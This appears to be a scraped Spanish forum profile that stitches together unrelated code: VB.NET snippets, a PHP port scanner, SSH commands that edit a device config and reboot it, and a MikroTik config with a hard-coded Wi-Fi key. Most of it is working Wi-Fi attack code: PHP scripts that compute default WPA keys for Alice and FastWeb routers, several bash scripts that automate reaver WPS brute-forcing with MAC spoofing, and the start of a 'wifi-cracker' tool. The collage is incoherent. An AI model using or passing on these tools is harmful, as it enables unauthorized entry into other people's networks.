Estuve buscando y con encontré nada, necesitaría pasar Argumentos o Parámetros más bien tomar desde un exe para completar por ejemplo un textbox, alguna idea?
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúLanguage = "Seleccionar.." (Idioma a Traducir) en este caso EN y ES
Localizable = True
Public Class Form1
Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
''español
Dim l As New CultureInfo("es", True)
Dim resources As ComponentResourceManager = New ComponentResourceManager(Me.GetType)
For Each c As Control In Me.Controls
resources.ApplyResources(c, c.Name, l)
Next c
End Sub
Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
''ingles
Dim l As New CultureInfo("en", True)
Dim resources As ComponentResourceManager = New ComponentResourceManager(Me.GetType)
For Each c As Control In Me.Controls
resources.ApplyResources(c, c.Name, l)
Next c
End Sub
End Class
Dns.GetHostEntry("8.8.8.8").HostName.ToString
¿Esta seguro que quiere ejecutar este programa que tiene una firma desconocida?
Editor: Desconocido.
sed -i 's/sys.modem.com=.*/sys.modem.com=5/g' /tmp/config.tpnn
<?php
error_reporting(0);
$ip = $_GET['ip'];
if(isset($ip)) {
for($i=1;$i<=1000;$i++) {
$conn = @fsockopen($ip, $i);
if ($conn) {
echo "Port $i is open on $ip. <br />";
fclose($conn);
}
}
}
?>
Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
Me.Cursor = Cursors.WaitCursor
'Create the objects needed to make the connection'
Dim sshConnectionInfo As New Renci.SshNet.PasswordConnectionInfo(SERVER, USER, PASS)
Dim sshClient As New Renci.SshNet.SshClient(sshConnectionInfo)
'Need to hold the command'
Dim cmd As Renci.SshNet.SshCommand
Using sshClient
'connect to the server'
sshClient.Connect()
If sshClient.IsConnected Then
'si esta conectado
'Run the command'
cmd = sshClient.RunCommand("y")
Threading.Thread.Sleep(2000)
cmd = sshClient.RunCommand("sed -i 's/VARS=.*/VARS=12/g' /tmp/dataconf.cfg #")
Threading.Thread.Sleep(2000)
cmd = sshClient.RunCommand("save #")
Threading.Thread.Sleep(2000)
cmd = sshClient.RunCommand("reboot #")
Me.Cursor = Cursors.Default
Else
'NO ESTA CONECTADO
End If
End Using
End Sub
echo "echo '<option value=\"opcion1\" selected>Opcion1</option>' >> /etc/opts.inc" > /etc/persistent/opts.it
:global ssid;
#| Wireless Configuration:
#| security-key: 2FF10121278B;
#| mode: ap-bridge;
#| band: 2ghz-b/g/n;
#| ht-chains: two;
#| ht-extension: 20/40mhz-ht-above;
#|
#| WAN (gateway) Configuration:
#| gateway: ether1 (renamed with extension '-gateway');
#| firewall: enabled;
#| NAT: enabled;
#| DHCP Client: enabled;
#|
#| LAN Configuration:
#| LAN Port: bridge-local;
#| switch group: ether2 (master), ether3, ether4, ether5
#| (renamed with extensions '-master-local' and '-slave-local')
#| LAN IP: 192.168.88.1;
#| DHCP Server: enabled;
:global action;
:local dhcpEnabled 0;
:local wirelessEnabled 0;
#check for wireless and dhcp packages
:if ([:len [/system package find name="dhcp" !disabled]] != 0) do={
:set dhcpEnabled 1;
}
:if ([:len [/system package find name="wireless" !disabled]] != 0) do={
:set wirelessEnabled 1;
}
#-------------------------------------------------------------------------------
# Apply configuration.
# these commands are executed after installation or configuration reset
#-------------------------------------------------------------------------------
:if ($action = "apply") do={
# wait for interfaces
:while ([/interface ethernet find] = "") do={ :delay 1s; };
:if ( $wirelessEnabled = 1) do={
:local count 0;
:while ([/interface wireless find] = "") do={
:set count ($count +1);
:if ($count = 60) do={
:log warning "DefConf: Unable to find wireless interface";
/ip address add address=192.168.88.1/24 interface=ether1;
/quit
}
:delay 1s;
};
/interface wireless set wlan1 mode=ap-bridge band=2ghz-b/g/n ht-txchains=0,1 ht-rxchains=0,1 \
disabled=no wireless-protocol=any distance=indoors
:local wlanMac [/interface wireless get wlan1 mac-address];
:set ssid "MikroTik-$[:pick $wlanMac 9 11]$[:pick $wlanMac 12 14]$[:pick $wlanMac 15 17]"
/interface wireless set wlan1 ssid=$ssid
/interface wireless security-profiles set default wpa-pre-shared-key=2FF10121278B wpa2-pre-shared-key=2FF10121278B mode=dynamic-keys authentication-types=wpa-psk,wpa2-psk
/interface wireless set wlan1 channel-width=20/40mhz-ht-above ;
}
/interface set ether1 name="ether1-gateway";
:if ( $dhcpEnabled = 1) do={
/ip dhcp-client add interface=ether1-gateway disabled=no comment="default configuration";
}
/interface {
set ether2 name=ether2-master-local;
set ether3 name=ether3-slave-local;
set ether4 name=ether4-slave-local;
set ether5 name=ether5-slave-local;
}
/interface ethernet {
set ether3-slave-local master-port=ether2-master-local;
set ether4-slave-local master-port=ether2-master-local;
set ether5-slave-local master-port=ether2-master-local;
}
/interface bridge
add name=bridge-local disabled=no auto-mac=no protocol-mode=rstp;
:local bMACIsSet 0;
:foreach k in=[/interface find] do={
:local tmpPortName [/interface get $k name];
:if (!($tmpPortName~"bridge" || $tmpPortName~"ether1"|| $tmpPortName~"slave")) do={
:if ($bMACIsSet = 0) do={
:if ([/interface get $k type] = "ether") do={
/interface bridge set "bridge-local" admin-mac=[/interface ethernet get $tmpPortName mac-address];
:set bMACIsSet 1;
}
}
/interface bridge port
add bridge=bridge-local interface=$tmpPortName;
}
}
/ip address add address=192.168.88.1/24 interface=bridge-local comment="default configuration";
:if ($dhcpEnabled = 1) do={
/ip pool add name="default-dhcp" ranges=192.168.88.10-192.168.88.254;
/ip dhcp-server
add name=default address-pool="default-dhcp" interface=bridge-local disabled=no;
/ip dhcp-server network
add address=192.168.88.0/24 gateway=192.168.88.1 dns-server=192.168.88.1 comment="default configuration";
}
/ip firewall nat add chain=srcnat out-interface=ether1-gateway action=masquerade comment="default configuration"
/ip firewall {
filter add chain=input action=accept protocol=icmp comment="default configuration"
filter add chain=input action=accept connection-state=established comment="default configuration"
filter add chain=input action=accept connection-state=related comment="default configuration"
filter add chain=input action=drop in-interface=ether1-gateway comment="default configuration"
filter add chain=forward action=accept connection-state=established comment="default configuration"
filter add chain=forward action=accept connection-state=related comment="default configuration"
filter add chain=forward action=drop connection-state=invalid comment="default configuration"
}
/tool mac-server disable [find];
/tool mac-server mac-winbox disable [find];
:foreach k in=[/interface find] do={
:local tmpName [/interface get $k name];
:if (!($tmpName~"ether1")) do={
/tool mac-server add interface=$tmpName disabled=no;
/tool mac-server mac-winbox add interface=$tmpName disabled=no;
}
}
/ip neighbor discovery set [find name="ether1-gateway"] discover=no
/ip dns {
set allow-remote-requests=yes
static add name=router address=192.168.88.1
}
}
#-------------------------------------------------------------------------------
# Revert configuration.
# these commands are executed if user requests to remove default configuration
#-------------------------------------------------------------------------------
:if ($action = "revert") do={
# remove wan port protection
/ip firewall {
:local o [nat find comment="default configuration"]
:if ([:len $o] != 0) do={ nat remove $o }
:local o [filter find comment="default configuration"]
:if ([:len $o] != 0) do={ filter remove $o }
}
/tool mac-server remove [find interface!=all]
/tool mac-server set [find] disabled=no
/tool mac-server mac-winbox remove [find interface!=all]
/tool mac-server mac-winbox set [find] disabled=no
# reset wan ports;
/ip neighbor discovery set [find name="ether1-gateway"] discover=yes
/interface set "ether1-gateway" name=ether1;
:if ($dhcpEnabled = 1) do={
:local o [/ip dhcp-server network find comment="default configuration"]
:if ([:len $o] != 0) do={ /ip dhcp-server network remove $o }
:local o [/ip dhcp-server find name="default" address-pool="default-dhcp" interface="bridge-local" !disabled]
:if ([:len $o] != 0) do={ /ip dhcp-server remove $o }
/ip pool {
:local o [find name="default-dhcp" ranges=192.168.88.10-192.168.88.254]
:if ([:len $o] != 0) do={ remove $o }
}
:local o [/ip dhcp-client find comment="default configuration"]
:if ([:len $o] != 0) do={ /ip dhcp-client remove $o }
}
/ip dns {
set allow-remote-requests=no
:local o [static find name=router address=192.168.88.1]
:if ([:len $o] != 0) do={ static remove $o }
}
/ip address {
:local o [find comment="default configuration"]
:if ([:len $o] != 0) do={ remove $o }
}
# remove switch
/interface set ether2-master-local name=ether2;
/interface ethernet set ether3-slave-local master-port=none;
/interface set ether3-slave-local name=ether3;
/interface ethernet set ether4-slave-local master-port=none;
/interface set ether4-slave-local name=ether4;
/interface ethernet set ether5-slave-local master-port=none;
/interface set ether5-slave-local name=ether5;
/interface bridge port remove [find bridge="bridge-local"]
/interface bridge remove [find name="bridge-local"]
:if ($wirelessEnabled = 1) do={
/interface set [find name~"wlan1"] name=wlan1
/interface wireless reset-configuration wlan1
}
}
/interface wireless set wlan1 mode=ap-bridge band=2ghz-b/g/n ht-txchains=0,1 ht-rxchains=0,1 \
disabled=no wireless-protocol=any distance=indoors
:local wlanMac [/interface wireless get wlan1 mac-address];
:set ssid "MikroTik-$[:pick $wlanMac 9 11]$[:pick $wlanMac 12 14]$[:pick $wlanMac 15 17]"
/interface wireless set wlan1 ssid=$ssid
/interface wireless security-profiles set default wpa-pre-shared-key=2FF10121278B wpa2-pre-shared-key=2FF10121278B mode=dynamic-keys authentication-types=wpa-psk,wpa2-psk
/interface wireless set wlan1 channel-width=20/40mhz-ht-above ;
CitarDar a raíz aplicaciones android me aterra - pone 100% de confianza en que el desarrollador no ser malicioso, y que el mercado no ha presentado un proyecto clonado que es malicioso, y en los sistemas de desarrolladores para asegurarse de que nadie jamás puede empujar una actualización con las llaves que se convierte malicioso ... es una mala noticia por todas partes.
Kismet Blog
<?php
/***************************************************************************
* Alice AGPF WPA Discovery *
* by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net *
* based on <http://wifiresearchers.wordpress.com/> *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
***************************************************************************/
/*
* Tabella per il calcolo del seriale.
*
* First SSID digits => ( SN1, k, Q )
*/
$SN_TABLE = array( '96' => array( '69102', 13, 96017051 ),
'93' => array( '69101', 13, 92398366 ),
'56' => array( '67902', 13, 54808800 ),
'55' => array( '67904', 8, 55164449 ),
'54' => array( '67903', 8, 52420689 ),
'48' => array( '67903', 8, 47896103 ),
'46' => array( '67902', 13, 39015145 ) );
/*
* Numeri magici da utilizzare per il calcolo dell'SHA256.
*/
$ALIS = "\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8";
/*
* Tabella di conversione da hash a wpa.
*/
$CONV_TABLE = "0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuv".
"wxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123";
/*
* SSID della rete.
*/
$SSID = "Alice-96154825";
/*
* MAC address del router.
*/
$MAC = "\x00\x23\x8E\x01\x02\x03";
/*
* Calcolo il seriale in base al SSID e alla tabella dei valori noti.
*/
$SN = SSID2SN($SSID);
/*
* Calcolo SHA256( MagicN + SN + MAC )
*/
$hash = SHA256( $ALIS.$SN.$MAC );
/*
* Converto la stringa dell'hash in un array di byte.
*/
$bytes = hash2bytes($hash);
/*
* Trovo la WPA utilizzando i primi 24 byte dell'hash come indici della tabella di covnersione.
*/
$wpa = "";
for( $i = 0; $i < 24; $i++ ){
$wpa .= $CONV_TABLE[ $bytes[$i] ];
}
echo "WPA : $wpa\n";
/*
* Funzione per risalire al seriale del router partendo dal suo SSID e utilizzando
* le tabelle dei valori noti.
*/
function SSID2SN( $ssid ){
global $SN_TABLE;
/*
* Prelevo il numero intero dall'SSID e ne prendo le prime due cifre
* per verificare che il router sia presente nella tabella.
*/
preg_match_all( "/^Alice\-([0-9]+)/", $ssid, $m );
$ssidn = $m[1][0];
$id = substr( $ssidn, 0, 2 );
if( isset( $SN_TABLE[$id] ) ){
/*
* Ok, il router è presente nella tabella, prelevo la prima parte del seriale e
* le costanti k e Q da utilizzare nell'equazione finale.
*/
$sn1 = $SN_TABLE[$id][0];
$k = $SN_TABLE[$id][1];
$Q = $SN_TABLE[$id][2];
/*
* La seconda parte del seriale equivale a :
* (SSID - Q) / k
*/
$sn2 = ((int)$ssidn - $Q) / $k;
/*
* Restituisco il seriale completo.
*/
return $sn1.'X'.sprintf( "%07s", $sn2 );
}
/*
* Router non presente nella tabella.
*/
else{
die( "La serie 'Alice-$id******' non è presente nella tabella e non è supportata.\n" );
}
}
/*
* Funzione per il calcolo di un hash SHA256.
*/
function SHA256( $phrase ){
return bin2hex( mhash( MHASH_SHA256, $phrase ) );
}
/*
* Funzione per convertire un hash in un array di byte interi.
*/
function hash2bytes( $hash ){
preg_match_all( "/[a-f0-9]{2}/i", $hash, $hash_bytes );
$bytes = array();
foreach( $hash_bytes[0] as $byte ){
$bytes[] = hexdec($byte);
}
return $bytes;
}
?>
<?php
/***************************************************************************
* FastWeb Pirelli WPA Discovery *
* by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
***************************************************************************/
/*
* SSID di partenza.
*/
$ssid = "FASTWEB-1-00193EA1B2C3";
/*
* 20 byte costanti cablati nel firmware dei Pirelli Fastweb.
*/
$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";
/*
* Prelevo la parte finale del SSID.
*/
$sn = split( '-', $ssid );
$sn = $sn[2];
/*
* La divido in gruppi di due caratteri, formando un array
* di 6 rappresentazioni esadecimali di byte.
*/
preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );
$sn_bytes = $sn_bytes[0];
/*
* Inizializzo una stringa con il valore intero di questi byte.
*/
$str = "";
for( $i = 0; $i < 6; $i++ ){
$str .= chr( hexdec( $sn_bytes[$i] ) );
}
echo "$str\n";
/*
* Aggiungo alla stringa i 20 byte "magici".
*/
$str .= $seq_20;
/*
* Ricavo i byte dell'hash md5 della stringa
*/
preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );
$md5_bytes = $md5_bytes[0];
$long = "";
/*
* Converto i byte in sequenze binarie di 8 bit.
*/
foreach( $md5_bytes as $byte ){
$long .= sprintf( "%08s", decbin( hexdec($byte) ) );
}
/*
* Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero
* di un gruppo sia maggiore di 0x0a, aggiungo 0x57.
*/
$hex_5 = array();
for( $i = 0; $i < 25; $i += 5 ){
$n = bindec( substr( $long, $i, 5 ) );
$hex_5[] = $n > 0x0a ? $n + 0x57 : $n;
}
/*
* Compongo la chiave.
*/
$wpa = "";
foreach( $hex_5 as $hex ){
$wpa .= sprintf( "%02x", $hex );
}
print "WPA : $wpa\n";
?>
#!/bin/bash
# This is a linux bash script i wrote that runs best on Backtrack 5 KDE
# It automates reaver WPS bruteforce attack. simply save it to a text file (remove the .txt extension make #it .sh)
# then chmod +x <thefilename> and run it ./<filename>
# enjoy
# Attack WPS enabled routers
clear
tput setaf 2; echo "##################################################################################"
tput setaf 2; echo "# ~Automate reaver WPS attack Bash script written by j0k3rr~ #"
tput setaf 2; echo "# 1-Tested on Backtrack 5 KDE #"
tput setaf 2; echo "# 2-Make sure your wifi card is plugged in before starting the script #"
tput setaf 2; echo "# 3-Any problems with the script feel free to contact me on twitter @j0k3rr1 #"
tput setaf 2; echo "# #"
tput setaf 2; echo "# #"
tput setaf 2; echo "# #"
tput setaf 2; echo "##################################################################################"
tput setaf 1; read -p "Press [Enter] to start hacking..."
clear
tput setaf 1; ifconfig | grep "wlan"
# Select your Wireless Interface ( wlan0 , wlan1, wlan2 )
tput setaf 2; read -p "Whats your Wireless interface? (Should be listed in red above) " winterface
# increase TX power to 30 dBm for wifi cards that can hanlde the shiznit
tput setaf 2; echo "Would you like to increase the TX Power of your wireless card to 30 dBm? Y/n"
read a
if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
iw reg set BO
iwconfig $winterface txpower 30
else
echo "continuing without changing the TX power"
fi
# Spoof Mac Address and put card into monitor mode
tput setaf 2; echo -e "Would you like to spoof the MAC address of your wifi card? Y/n"
read b
if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
wmac=00:11:22:33:44:55
airmon-ng stop $winterface
ifconfig $winterface down
macchanger --mac 00:11:22:33:44:55 $winterface
ifconfig $winterface up
tput setaf 1; airmon-ng start $winterface
else
tput setaf 1; echo "continuing without changing the mac address"
tput setaf 1; airmon-ng start $winterface
fi
tput setaf 2; read -p "Whats the monitor mode interface? (Usually mon0) " minterface
# Start airodump-ng to monitor the airwaves.
clear
tput setaf 1; echo "About to start monitoring the air! "
sleep 3
konsole --hold -e wash -i $minterface
sleep 5
# Prompt user for Targets BSSID #
tput setaf 2; echo "Input the WPS enabled access points details: "
tput setaf 1; read -p "BSSID: " xBSSID
tput setaf 1; read -p "Channel number: " xCH
# Attack the Access point
konsole --hold -e reaver -i $minterface -c $xCH -b $xBSSID -vv &
# End
clear
tput setaf 2; echo "[+] Process Started:"
tput setaf 2; echo "[+] Attacking " $xBSSID "on channel " $xCH " Goodluck and Happy Cracking"
wait
#!/bin/bash
clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read setup
if [[ $setup == 'y' ]]; then
#Setup the monitor interface
echo "[+] What Wireless interfaces do we have..."
iwconfig
echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
read interface
if [[ $interface == '' ]]; then
interface=wlan0 #Default to wlan0
fi
echo "[+] Starting monitor Mode for $interface"
airmon-ng start $interface
iwconfig
fi #End Mon Mode Setup Portion
#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read monInterface
if [[ $monInterface == '' ]]; then
monInterface=mon0 #Default to mon0
fi
#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig $monInterface down
macchanger -r $monInterface
ifconfig $monInterface up
#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i $monInterface
#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read target
#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
read reaverVars
#Start REAVERINGGGGG!!!!
echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
reaver -i $monInterface -b $target $reaverVars
#Stop Monitor Mode Interface if the script set it up
if [[ $setup == 'y' ]]; then
echo ""
echo "[+] killing Monitor Interface"
airmon-ng stop $monInterface
fi
#! /bin/bash
#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012
#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)
wireless_interface=wlan0
#The timeout (in seconds) for wash to search for WPS-enabled access points
wash_timeout=15
#Flag to allow user to choose target AP
allow_user_choice=1
#Delay between attack attempts
reaver_delay=0
#Check for root privileges
if (( EUID != 0 )); then
echo "This script needs root"
exit 1
fi
#Check for required commands
for command in airmon-ng wash reaver
do
if [[ -z $(which $command) ]]; then
echo "$command was not found"
echo "To install $command, you may follow this link"
echo "http://lmgtfy.com/?q=$command+installation"
exit 1
fi
done
echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"
#Check available interfaces and close previous monitor interfaces and wireless lan
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
do
if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
echo "* Shutting down $interface"
airmon-ng stop $interface > /dev/null
fi
done
echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null
echo "Identifying WPS-enabled access points"
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')
if [[ -n $(echo $APs) ]]; then
if (( $allow_user_choice )); then
n=1
echo "The following access points were detected"
for ap in $APs
do
echo "* $n: $ap"
((n++))
done
read -p "Enter your choice: " choice
if [[ $choice -le $n ]]; then
chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
echo "You have chosen $chosen_ap"
else
echo "Invalid choice!"
exit 1
fi
else
chosen_ap=$(echo "${APs}" | head -n1)
echo "Proceeding with choice 1: $chosen_ap"
fi
tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
rm washOutput.txt
channel=$(echo $tempLine | cut -f2 -d' ')
mac_address=$(echo $tempLine | cut -f1 -d' ')
echo "Starting reaver"
echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
echo "AP name: $chosen_ap"
echo "Channel: $channel"
echo "MAC Address: $mac_address"
reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
else
echo "No networks found. Consider increasing the wash timeout. Terminating"
exit 1
fi
#!/bin/bash
#The current function to check for internet connection might be wrong sometimes, I'll try to find a better one. You can help by emailing @ andr920jhckrs+WIFICRACKER@gmail.com
# READ ABOUT FUNCTION!!!!!!
#~~~~~~~~~~~~~~~~~~~~ERROR CODES~~~~~~~~~~~~~~~~~
#EXIT 1 = not root
#EXIT 2 = dependencies
#EXIT 3 = after update
#EXIT 4 = normal exit, script over
#EXIT 5 = used quit
#EXIT ? = UNKNOWN ERROR PLEASE REPORT!!!
#======================================= VARIABLES =======================================#
#Colors for error message
RED='\033[0;41;30m'
STD='\033[0;0;39m'
#Variables
INTERFACE="wlan0"
BSSID="00:BB:CC:DD:EE:FF"
CHANNEL="7"
MAC="00:11:22:33:44:55"
CMAC="USED FOR CURRENT MAC"
INTERFACE2="mon0"
FILE="wifi-cracker"
ESSID="linksys"
MONMODE="OFF"
MACINFO="OFF"
MACMODE="OFF"
MACOPTION="m ${MAC}"
AIREPLAYPID="NOT RUNNING"
AIRODUMPPID="NOT RUNNING"
TERMINAL="gnome-terminal"
TERMCMD="USED BY TERMINAL COMMANDS"
KEY="NOTHING SAVED"
FILE2="tshark-output"
WIFICONNECTION="USED BY UPDATE FUNCTION"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! FUNCTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! DEBUGING STUFF !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
debug() {
while true
do
show_logo
get_mac
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo " D E B U G - M E N U"
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo ""
echo "Please choose an option"
echo " 1. Change Variables"
echo " 2. Update Current Mac (${CMAC})"
echo " 3. CLEAN UP FILES"
echo " 4. Use Terminal Commands"
echo " 5. Check airmon-ng"
echo " 6. Check iwconfig"
echo " 7. Check ifconfig"
echo " 8. Check macchanger"
echo " 9. *MENU* Exit to main menu"
echo "10. Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 10 ] " choice
case $choice in
1) changevar_menu ;;
2) get_mac ;;
3) clean_up ;;
4) read -p "MESSAGE: ENTER YOUR TERMINAL COMMAND here : " TERMCMD && ${TERMCMD} && pause ;;
5) echo "MESSAGE: VIEWING airmon-ng : " && airmon-ng && pause ;;
6) echo "MESSAGE: VIEWING iwconfig : " && iwconfig && pause ;;
7) echo "MESSAGE: VIEWING ifconfig : " && ifconfig && pause ;;
8) echo "MESSAGE: VIEWING macchanger -s : " && macchanger -s ${INTERFACE} && pause ;;
9) main_menu ;;
10) f_exit ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
changevar_menu() {
while true
do
show_logo
get_mac
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo " DEBUG MENU -> VARIABLES"
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo "Those are most of the variables of this script!"
echo "most because there are local variables (CHOICE;CONFIRM;COMMAND;WIFI)"
echo "DON'T MESS WITH THOSE UNLESS REALLY NEED TO!"
echo ""
echo " 1. *MENU* Back to debug"
echo " 2. *MENU* Exit to main menu"
echo " 3. EXIT WIFI-CRACKER"
echo "Chose an option to change the variable"
echo " 4. Primary interface : ${INTERFACE}"
echo " 5. Target BSSID : ${BSSID}"
echo " 6. Target Channel : ${CHANNEL}"
echo " 7. Desired MAC : ${MAC}"
echo " 8. Current MAC : ${CMAC}"
echo " 9. Monitor interface : ${INTERFACE2}"
echo "10. Save filename : ${FILE}"
echo "11. Target ESSID : ${ESSID}"
echo "12. Monitor Mode : ${MONMODE}"
echo "13. MAC INFO mode : ${MACINFO}"
echo "14. MAC Spoof mode : ${MACMODE}"
echo "15. Macchanger option : ${MACOPTION}"
echo "16. Aireplay PID : ${AIREPLAYPID}"
echo "17. Airodump PID : ${AIRODUMPPID}"
echo "18. Your terminal : ${TERMINAL}"
echo "19. Variable TERMCMD : ${TERMCMD}"
echo "20. WIFI KEY : ${KEY}"
echo "21. Tshark output name: ${FILE2}"
echo "22. Wifi Connection : ${WIFICONNECTION}"
echo ""
echo "Variable RED : ${RED}"
echo "Variable STD : ${STD}"
echo ""
echo "Script Argument 1 : ${1}"
echo "Script Argument 2 : ${2}"
echo "Script Argument 3 : ${3}"
echo "Script Argument 4 : ${4}"
echo "Script Argument 5 : ${5}"
local choice
read -p "Enter choice [ 1 - 22 ] " choice
case $choice in
1) debug ;;
2) main_menu ;;
3) f_exit ;;
4) read -p "Enter new Variable here : " INTERFACE && pause ;;
5) read -p "Enter new Variable here : " BSSID && pause ;;
6) read -p "Enter new Variable here : " CHANNEL && pause ;;
7) read -p "Enter new Variable here : " MAC && pause ;;
8) read -p "Enter new Variable here : " CMAC && pause ;;
9) read -p "Enter new Variable here : " INTERFACE2 && pause ;;
10) read -p "Enter new Variable here : " FILE && pause ;;
11) read -p "Enter new Variable here : " ESSID && pause ;;
12) read -p "Enter new Variable here : " MONMODE && pause ;;
13) read -p "Enter new Variable here : " MACINFO && pause ;;
14) read -p "Enter new Variable here : " MACMODE && pause ;;
15) read -p "Enter new Variable here : " MACOPTION && pause ;;
16) read -p "Enter new Variable here : " AIREPLAYPID && pause ;;
17) read -p "Enter new Variable here : " AIRODUMPPID && pause ;;
18) read -p "Enter new Variable here : " TERMINAL && pause ;;
19) read -p "Enter new Variable here : " TERMCMD && pause ;;
20) read -p "Enter new Variable here : " KEY && pause ;;
21) read -p "Enter new Variable here : " FILE2 && pause ;;
21) read -p "Enter new Variable here : " WIFICONNECTION && pause ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
check_internet() {
local WIFI
WIFI=`ifconfig wlan0 | grep -n Bcast`
case ${WIFI} in
"") WIFICONNECTION="OFF" ;;
*) WIFICONNECTION="ON"
esac
case ${WIFICONNECTION} in
"ON") echo "MESSAGE: WIFI/INTERNET APPARENTLY CONNECTED!";;
"OFF")echo "MESSAGE: YOU MUST BE CONNECTED TO THE INTERNET FOR THIS TO WORK!" & sleep 5 & main_menu ;;
*) echo -e "${RED}Error...${STD}" && sleep 2
esac
}
###########################################################################################
clean_up() {
local CONFIRM
read -p "Would you like WIFI-CRACKER to clean up it's files [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
show_logo &
echo "CLEANING UP..." &
kill ${AIRODUMPPID} &
kill ${AIREPLAYPID} &
rm *.ivs *.cap *.xor *.wpc &
reset_mac &
echo "CLEANING UP...DONE" &
sleep 3 ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, CONTINUING...${STD}" && sleep 2
esac
local CONFIRM
read -p "Would you like WIFI-CRACKER to delete dependencies [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
show_logo &
echo "DELETING DEPENDENCIES..." &
apt-get remove aircrack-ng macchanger reaver tshark wireshark &
echo "DELETING DEPENDENCIES...DONE" &
sleep 3 ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, CONTINUING...${STD}" && sleep 2
esac
}
###########################################################################################
pause(){
echo ""
echo ""
read -p "Press [Enter] key to continue..." fackEnterKey
clear
}
###########################################################################################
f_exit(){
clean_up
show_logo
echo "############################################################################"
echo "#########################NOW EXITING WIFI-CRACKER###########################"
echo "############################################################################"
echo ""
echo "reseting wireless interface."
ifconfig ${INTERFACE} down
echo "reseting wireless interface.."
ifconfig ${INTERFACE} up
echo "reseting wireless interface...DONE!"
echo ""
echo "IF YOUR WIFI STOPPED WORKING, TURN IT OFF THEN BACK ON"
